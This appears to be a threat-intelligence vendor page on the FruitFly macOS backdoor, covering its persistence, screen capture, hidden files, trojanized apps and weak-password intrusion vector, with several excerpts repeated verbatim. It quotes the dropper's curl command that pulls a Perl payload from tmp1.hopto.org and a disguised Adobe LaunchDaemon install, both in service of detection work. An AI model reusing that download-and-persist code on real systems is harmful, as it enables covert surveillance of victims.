FruitFly, also known as Quimitchin, is a macOS malware family associated with long-running espionage activity against Apple systems. It is notable for extensive use of Perl components and for combining simple persistence mechanisms with surveillance and host-management functions. Observed behavior includes taking desktop screenshots, enumerating running processes, deleting files, storing itself as a hidden dot-prefixed file, and executing obfuscated Perl scripts. FruitFly commonly persists through macOS Launch Agents, and related installer or dropper components have also created LaunchDaemons or modified application bundles to maintain execution.
Documented installation workflows show that FruitFly can be deployed through a dropper that retrieves a second-stage payload, writes it to disk, and establishes persistence either at the user level or system level. Another observed mode replaces legitimate macOS application executables with a wrapper that launches the malware and can optionally invoke the original program, enabling trojanized application delivery and stealthy re-execution. This tradecraft is consistent with attacker access obtained after compromise rather than a self-spreading worm.
FruitFly has been linked to intrusions in which exposed remote-access services on Macs were scanned and weak credentials were targeted, indicating that some deployments likely followed unauthorized remote access to victim systems. The malware is best characterized as macOS spyware or a backdoor used for post-compromise surveillance and control rather than commodity crimeware. Its emphasis on persistence, screen capture, process discovery, hidden storage, and operational cleanup reflects an intelligence-collection role on infected hosts.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
17 distinct techniques documented for this family, organized by ATT&CK tactic.
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
Bundlore can persist via a LaunchAgent. Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence. CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.
Let’s try the FILE can end in /+fpsaud to treat up to / as the main drive root and create a root infection option... Doing root /Library/LaunchDaemons/com.adobe.fpsaud2.plist => /Library/Application Support/Adobe/fpsaud ... Wrote /Library/LaunchDaemons/com.adobe.fpsaud2.plist
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
Bundlore can persist via a LaunchAgent. Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence. CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.
Let’s try the FILE can end in /+fpsaud to treat up to / as the main drive root and create a root infection option... Doing root /Library/LaunchDaemons/com.adobe.fpsaud2.plist => /Library/Application Support/Adobe/fpsaud ... Wrote /Library/LaunchDaemons/com.adobe.fpsaud2.plist
"Action RAT's commands, strings, and domains can be Base64 encoded within the payload." / "ADVSTORESHELL... strings... encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed." / "APT29 has used encoded PowerShell commands." / "APT41 used VMProtected binaries..."
Doing root /Library/LaunchDaemons/com.adobe.fpsaud2.plist => /Library/Application Support/Adobe/fpsaud ... FruitFly has specific code to support this third mode on a few variants of Adobe Acrobat Reader, Google Chrome, and TOCGenerator
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
It still doesn’t help to understand the infection vector, which has been described as port scanning for services with weak or no passwords... AFP, RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.
APT19 used Base64 to obfuscate executed commands; APT32 used Invoke-Obfuscation to obfuscate PowerShell; Aquatic Panda encoded PowerShell commands in Base64; numerous groups and malware used Base64, XOR, RC4, compression, encryption, variable substitution, and other methods to obfuscate scripts and commands.
Agent Tesla has created hidden folders. AppleJeus has added a leading . to plist filenames, unlisting them from the Finder app and default Terminal directory listings. APT28 has saved files with hidden file attributes. FIN13 has created hidden files and folders within a compromised Linux system /tmp directory and also used attrib.exe to hide gathered local host information.
The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM)
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Because there is direct code execution these two modes appear to be used when there is interactive access to the victim machine (for example weak RDP/VNC/SSH passwords)... The attacks via AFP now make sense because this script shows how that kind of access was being leveraged.
"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"
This script is responsible for downloading the 2nd stage malicious payload... The second stage payload is downloaded using curl -s tmp1.hopto.org:57777/z.pl ... The .client will be the known malicious Perl script... created with the following code: docmd ( "curl -s tmp1.hopto.org:57777/z.pl > '$_[0]'" );
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
11 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mentioned only as historical comparison for misuse of the macOS defaults utility.
Mac malware/backdoor written largely in Perl. The described dropper downloads a second-stage payload, installs persistence via LaunchAgents or LaunchDaemons, and can also infect legitimate applications to trigger payload retrieval and execution.
Malware that executes and stores obfuscated Perl scripts.
macOS malware that persists via a Launch Agent.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.